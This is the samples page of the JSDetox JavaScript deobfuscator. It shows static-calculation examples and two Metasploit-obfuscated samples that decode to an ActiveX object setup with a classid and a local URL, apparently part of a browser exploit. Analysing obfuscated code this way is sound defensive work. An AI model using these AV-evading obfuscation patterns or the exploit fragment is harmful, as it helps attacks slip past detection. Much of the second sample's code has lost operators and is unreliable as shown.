Jsdetox - Samples
Info | Installation | Docs | Samples | Screencasts
Simple calculation
JSDetox analyzes the given code and tries to solve calculations through static analysis of the code:
(If you try the first two simple examples in JSDetox, be sure to check the option “Do not trace variable values” - otherwise the result will be an emtpy string: the variable x is never referenced and the assignment has no effects, so it gets removed.)
Original Code
var x = 10 * 3 + 100 - 70 / 10;
Analysis Result
var x = 123;
Call to known function with static result
Calls to known functions with predictable results get calculated.
Original Code
var x = -~-~'bp'[720094129.0.toString(2 << 4) + ""] * 8 + 2;
Analysis Result
var x = 34;
Calculation
720094129.0.toString(2 << 4) => 720094129.toString(32) => "length"
'bp'[length] => 'bp'.length => 2
-~-~2 => 4
4 * 8 + 2 => 34
Metasploit Javascript Obfuscator
The main purpose of the Metasploit Javascript obfuscator is to hinder automatic analysis and evade AV detection, but it also makes manual analysis hard.
As the original code does not use an eval() call in the decryptor, there is no function call to break on and extract the decrypted original Javascript code.
This obfuscator makes the code hard to read by introducing complicated calculations of strings and renaming variables.
The code gets blown up without introducing external dependencies - so it is possible to reverse the process using static analysis.
The Metasploit blog contains more information on this obfuscator: Javascript Obfuscation in Metasploit
Original Code
var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,
060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);
Analysis Result
var GPSweCkB = document.createElement("object");
GPSweCkB.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
GPSweCkB.url = "http://127.0.0.1:8080//puFbJofTczCYRuAoQ/";
Metasploit Javascript Obfuscator (2)
This example shows that a real analysis is done instead of matching known patterns in the original code.
The original code from the previous example got fed again into the Metasploit obfuscator, making the code even bigger and more complicated. JSDetox is still able to calculate a condensed version of the original code.
Original Code
var vqeJMM = document.createElement((function() {
var lmuxifox = (function () { var lFuh="ect",OtcD="j"; return OtcD+lFuh })(), qvrqA = String.fromCharCode(0x6f,98);
return qvrqA + lmuxifox;
})());
vqeJMM.setAttribute((function() {
var BrE = String.fromCharCode(115,0x73,105,100), oWnuEB = String.fromCharCode(97), bWVwPmvte = String.fromCharCode(0143,0154);
return bWVwPmvte + oWnuEB + BrE;
})(), (function() {
var VZKfxYVTesUuNa = String.fromCharCode(55,065,0x36,54), ANrWHzMVmQTEnX = (function () { var DsIA="7"; return DsIA })(), qnz = (function () { var uUmi="c"; return uUmi })(), plzNK = String.fromCharCode(0x36,055,062,70,0x35), brtluDTu = (function () { var eJeU="d",DJnq="si"; return DJnq+eJeU })(), AqMDLOwdJANJk = String.fromCharCode(0105,0x2d,52,0x42,0101,70), tjHrCLeCTfpRnX = (function () { var cVWQ="9"; return cVWQ })(), cwPWStJQJ = String.fromCharCode(0x2d,0x41,0103,062,0x38,0x2d,0103,0x46,062,066,65,0101), EfyYAZclv = String.fromCharCode(108), ZdLqwiaf = String.fromCharCode(53,070), IrOpZfY = (function () { var TtsU="6",kdod="63"; return kdod+TtsU })(), rOkewIqjVTn = (function () { var auio="5",JgSf=":5"; return JgSf+auio })();
return qnz + EfyYAZclv + brtluDTu + rOkewIqjVTn + tjHrCLeCTfpRnX + IrOpZfY + ANrWHzMVmQTEnX + plzNK + AqMDLOwdJANJk + cwPWStJQJ + ZdLqwiaf + VZKfxYVTesUuNa;
})());
vqeJMM.url = String.fromCharCode((1*0x40+40), ('Z'.length*0x6c+8), ('z'.length0x63+17), (01('cu'.length*0x2f+6)+12), ('e'.length0x2c+14), (017'HMF'.length+2), ('q'.length*('q'.length0x12+13)+16), ('O'.length(0x1*('uLq'.length*6+2)+11)+18), (010x1f+19), (02('wuk'.length06+5)+9), ('BW'.length('WQD'.length*'NmmgJ'.length+2)+12), ('g'.length*0x26+10), ('S'.length*044+10), ('MK'.length*0x11+14), ('T'.length*0x2e+0), ('oe'.length026+5), ('KNS'.length(0x1(7'di'.length+0)+3)+7), ('b'.length052+14), ('E'.length(1030+14)+10), ('c'.length('ojyWqHE'.length*'ZDWrf'.length+3)+18), (01*0x2c+4), (01*42+5), (('hm'.length0x12+11)'m'.length+0), (05(0x1(0x2012+1)+1)+2), (1('Ws'.length*034+9)+52), ('hjc'.length*022+16), (01*78+20), ('zL'.length37+0), ('s'.length('C'.length0x46+32)+9), ('nfzRwUXL'.length(0x40x3+0)+6), (0x1(02*21+7)+35), (01*0x5d+6), ('EU'.length053+36), ((('nz'.length'kaUOP'.length+1)*'F'.length+0)*0x6+1), ('k'.length*0115+12), ('a'.length*0x2c+38), (5*026+7), ('a'.length0x26+27), (0x1(1(0x2(30x8+6)+7)+21)+23), ('m'.length(02*(0x1*0x10+12)+18)+7), (01*035+18));
Analysis Result
var vqeJMM = document.createElement("object");
vqeJMM.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
vqeJMM.url = "http://127.0.0.1:8080//puFbJofTczCYRuAoQ/";